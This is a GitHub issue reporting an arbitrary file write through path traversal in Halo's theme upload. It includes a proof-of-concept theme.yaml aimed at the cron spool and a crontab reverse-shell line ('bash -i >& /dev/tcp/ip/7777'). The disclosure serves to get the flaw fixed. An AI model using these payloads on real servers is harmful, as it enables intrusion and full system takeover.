### ISSUE TITLE
An Arbitrary file writing vulnerability in the backend

### ISSUE THREAD

**Issue by PeteLing** [halo-dev/halo#495]
## environment
ubuntu16.04 & centos

---

## vulnerability detail
The function for adding the new theme in the backend
![image1](https://raw.githubusercontent.com/PeteLing/photo/master/cve1.png)
the theme.yaml in the zip 
```
id: abc/../../../../halotest
name: test222
author:
  name: test
  website: test
description: A other Halo the2me
logo: http://test.ceye.io
website: https://github.com/halo-dev/halo-theme-tes
repo: https://github.com/halo-dev/halo-theme-anateste
version: 1.1
```
we look for the system directory
![image2](https://raw.githubusercontent.com/PeteLing/photo/master/cve2.png)
Therefore, the attacker can overwrite some files, such as ftl files, .bashrc files or crontab file in the user directory, and finally get the shell and permissions of the operating system.

---

## Get Shell
I have tested in the centos server
`root` file in the zip
`* * * * * bash -i >& /dev/tcp/ip/7777 0>&1`
`theme.yaml` in the zip
```
id: abc/../../../../../var/spool/cron
name: test222
author:
  name: tes2t2
  website: test
description: A other Halo the2me
logo: http://test.ceye.io
website: https://github.com/halo-dev/halo-theme-tes
repo: https://github.com/halo-dev/halo-theme-anateste
version: 1.1
```
upload the zip file and get the shell in hacker server
![image3](https://raw.githubusercontent.com/PeteLing/photo/master/cve5.png)

---

## Reason
the function in the ThemeServiceImple.java. get the `id` in the theme.yaml  and use it directly without `checkDirectoryTraversal`
```
    @Override
    public ThemeProperty add(Path themeTmpPath) throws IOException {
        Assert.notNull(themeTmpPath, "Theme temporary path must not be null");
        Assert.isTrue(Files.isDirectory(themeTmpPath), "Theme temporary path must be a directory");

        log.debug("Children path of [{}]:", themeTmpPath);

        try (Stream<Path> pathStream = Files.list(themeTmpPath)) {
            pathStream.forEach(path -> log.debug(path.toString()));
        }

        // Check property config
        ThemeProperty tmpThemeProperty = getProperty(themeTmpPath);

        // Check theme existence
        boolean isExist = getThemes().stream()
                .anyMatch(themeProperty -> themeProperty.getId().equalsIgnoreCase(tmpThemeProperty.getId()));

        if (isExist) {
            throw new AlreadyExistsException("当前安装的主题已存在");
        }

        // Copy the temporary path to current theme folder
        Path targetThemePath = themeWorkDir.resolve(tmpThemeProperty.getId());
        FileUtils.copyFolder(themeTmpPath, targetThemePath);

        // Get property again
        ThemeProperty property = getProperty(targetThemePath);

        // Clear theme cache
        this.eventPublisher.publishEvent(new ThemeUpdatedEvent(this));

        // Delete cache
        return property;
    }
```
